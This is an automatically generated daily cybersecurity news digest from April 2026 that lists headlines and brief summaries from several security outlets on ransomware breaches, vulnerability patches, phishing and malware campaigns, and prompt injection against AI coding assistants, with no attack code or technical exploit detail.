Current AI-powered SOC tools primarily accelerate alert triage rather than reducing actual workload for security teams. True operational efficiency requires end-to-end workflow automation t…
rss:BleepingComputer
21:00 KSA
HIGH phishing
New ATHR vishing platform uses AI voice agents for automated attacks
ATHR is a new cybercrime platform enabling fully automated voice phishing (vishing) attacks that combine human operators with AI voice agents for credential harvesting. The platform represents …
rss:Malwarebytes Lab
19:54 KSA
MEDIUM phishing
“iCloud storage is full” scam is back, and now it wants your payment details
A phishing campaign targeting Apple users has resurfaced, using fake iCloud storage warnings to create urgency and trick victims into providing payment card details. The scam threatens …
rss:Malwarebytes Lab
19:54 KSA
LOW general
Browser Guard gets even better with Access Control
Malwarebytes Browser Guard introduces enhanced Access Control features allowing users to manage website permissions for camera, microphone, location, and notifications. This security enhancement helps prevent u…
rss:The Hacker News
19:54 KSA
HIGH data_breach
[Webinar] Find and Eliminate Orphaned Non-Human Identities in Your Environment
Compromised service accounts and forgotten API keys caused 68% of cloud breaches in 2024, surpassing phishing and weak passwords. Organizations face 40-50 automated credentials per em…
rss:SecurityWeek
18:48 KSA
MEDIUM general
Artemis Emerges From Stealth With $70 Million in Funding
Artemis, a new cybersecurity startup, secured $70 million in funding to develop AI-powered defense solutions. The company focuses on preventing AI-driven attacks across applications, users, machines, and c…
rss:SecurityWeek
18:48 KSA
HIGH vulnerability
Splunk Enterprise Update Patches Code Execution Vulnerability
Splunk released a security update addressing a critical code execution vulnerability that allows low-privileged users to upload files and achieve remote code execution. Organizations using Splunk Ente…
rss:SecurityWeek
18:48 KSA
CRITICAL ransomware
Data Breach at Tennessee Hospital Affects 337,000
Cookeville Regional Medical Center suffered a ransomware attack by the Rhysida group, resulting in theft of 500GB of sensitive data affecting 337,000 individuals. This incident highlights the ongoing threat of ra…
rss:The Hacker News
18:48 KSA
HIGH supply_chain
Hidden Passenger? How Taboola Routes Logged-In Banking Sessions to Temu
A bank-approved Taboola tracking pixel was found redirecting logged-in banking sessions to Temu tracking endpoints without the bank's knowledge or user consent. This incident highlights seri…
rss:The Hacker News
18:48 KSA
HIGH malware
Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT in Targeted Finance, Crypto Attacks
A sophisticated social engineering campaign exploits Obsidian note-taking application plugins to deliver PHANTOMPULSE RAT malware. The attacks specifically target individuals in …
rss:The Hacker News
18:48 KSA
CRITICAL vulnerability
Cisco Patches Four Critical Identity Services, Webex Flaws Enabling Code Execution
Cisco released patches for four critical vulnerabilities in Identity Services and Webex Services that enable arbitrary code execution. Attackers could exploit these flaws to imper…
rss:BleepingComputer
18:48 KSA
CRITICAL vulnerability
Cisco says critical Webex Services flaw requires customer action
Cisco released security updates for four critical vulnerabilities, including an improper certificate validation flaw in Webex Services that requires customer action. The vulnerability affects the c…
rss:SecurityWeek
17:36 KSA
MEDIUM vulnerability
NIST Prioritizes NVD Enrichment for CVEs in CISA KEV, Critical Software
NIST announced it will prioritize enrichment of CVE entries that are listed in CISA's Known Exploited Vulnerabilities catalog or affect critical software, rather than enriching all CVEs auto…
rss:SecurityWeek
17:36 KSA
HIGH vulnerability
Microsoft Paid Out $2.3 Million at Zero Day Quest 2026 Hacking Contest
Security researchers discovered over 80 high-impact vulnerabilities in Microsoft's cloud and AI systems during a competitive hacking event with a $5 million prize pool. Microsoft awarded $2.3…
rss:BleepingComputer
17:36 KSA
HIGH data_breach
Data breach at edtech giant McGraw Hill affects 13.5 million accounts
ShinyHunters extortion group leaked data from 13.5 million McGraw Hill user accounts after breaching the company's Salesforce environment. The breach affects a major educational technology pro…
rss:Mandiant Blog
16:32 KSA
HIGH vulnerability
Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever
AI models are now capable of discovering software vulnerabilities at unprecedented speeds, even without being specifically designed for security testing. Organizations must adapt …
rss:Malwarebytes Lab
16:32 KSA
HIGH malware
A fake Slack download is giving attackers a hidden desktop on your machine
A trojanized Slack installer appears legitimate but secretly creates an invisible desktop environment that allows attackers to access user accounts and sensitive data. The malware operate…
rss:SecurityWeek
16:32 KSA
CRITICAL vulnerability
Cisco Patches Critical Vulnerabilities in Webex, ISE
Cisco has released patches for critical vulnerabilities in Webex and Identity Services Engine (ISE) that allow remote attackers to impersonate users or execute arbitrary commands on the underlying operating sy…
rss:SecurityWeek
16:32 KSA
HIGH ransomware
Ransomware Hits Automotive Data Expert Autovista
Autovista, a leading automotive data and analysis company, has been hit by a ransomware attack. The company is currently working with external cybersecurity experts to investigate the incident and assess the impac…
rss:Malwarebytes Lab
15:25 KSA
HIGH data_breach
Booking.com breach gives scammers what they need to target guests
Booking.com suffered a data breach exposing guest reservation data. Scammers are leveraging this stolen information to impersonate hotels and conduct phishing attacks targeting guests to steal pay…
rss:SecurityWeek
15:25 KSA
HIGH vulnerability
Claude Code, Gemini CLI, GitHub Copilot Agents Vulnerable to Prompt Injection via Comments
Security researcher disclosed a new AI attack method called 'Comment and Control' that exploits prompt injection vulnerabilities in popular AI coding assistants including …
rss:BleepingComputer
15:25 KSA
HIGH insider
US nationals behind DPRK IT worker 'laptop farm' sent to prison
Two U.S. nationals were imprisoned for operating a laptop farm scheme that enabled North Korean IT workers to pose as U.S. residents and infiltrate over 100 American companies, including F…
rss:BleepingComputer
14:00 KSA
HIGH vulnerability
Microsoft: April Windows Server 2025 update may fail to install
Microsoft is investigating installation failures of the April KB5082063 security update on Windows Server 2025 systems. This issue may leave affected servers without critical security patches, poten…
rss:Recorded Future
12:51 KSA
HIGH apt
Iran War: Future Scenario and Business Implications
Analysis of potential Iran conflict scenarios and their implications for business operations and cybersecurity posture. Geopolitical tensions with Iran pose significant cyber threats to critical infrastructure …
rss:Dark Reading
12:50 KSA
HIGH ransomware
6-Year Ransomware Campaign Targets Turkish Homes & SMBs
A six-year ransomware campaign has been targeting Turkish homes and small-to-medium businesses with minimal detection. The prolonged operation highlights how attacks on smaller entities often go unr…
rss:The Hacker News
12:50 KSA
HIGH malware
UAC-0247 Targets Ukrainian Clinics and Government in Data-Theft Malware Campaign
Ukrainian government agencies and healthcare institutions, including clinics and emergency hospitals, are being targeted by the UAC-0247 threat actor in a data-theft campaign. The malwa…
rss:Mandiant Blog
04:54 KSA
HIGH ransomware
The German Cyber Criminal Überfall: Shifts in Europe's Data Leak Landscape
Germany has become the primary target for cyber extortion in Europe, with data leak site posts increasing nearly 50% globally in 2025. German infrastructure is experiencing dispropor…
rss:Dark Reading
04:54 KSA
CRITICAL vulnerability
Critical MCP Integration Flaw Puts NGINX at Risk
A near-maximum severity vulnerability in nginx-ui allows attackers to restart, create, modify, and delete NGINX configuration files, potentially compromising web server infrastructure. This flaw poses significant …
rss:BleepingComputer
04:54 KSA
HIGH malware
New AgingFly malware used in attacks on Ukraine govt, hospitals
A newly discovered malware family called AgingFly is targeting Ukrainian government entities and hospitals, stealing authentication credentials from Chromium-based browsers and WhatsApp. This target…
rss:BleepingComputer
04:54 KSA
CRITICAL vulnerability
Critical Nginx UI auth bypass flaw now actively exploited in the wild
A critical authentication bypass vulnerability in Nginx UI with MCP support is being actively exploited in the wild, allowing attackers to achieve complete server takeover without any authenti…
rss:Recorded Future
03:48 KSA
LOW general
4 Essential Integration Workflows for Operationalizing Threat Intelligence (Recorded Future)
Recorded Future outlines four essential integration workflows for operationalizing threat intelligence within existing security infrastructure. The guide covers four stage…
📰 Cybersecurity News
0 articles
📰 No news aggregated today yet

This digest is updated automatically every day — Last updated: Thursday, April 16, 2026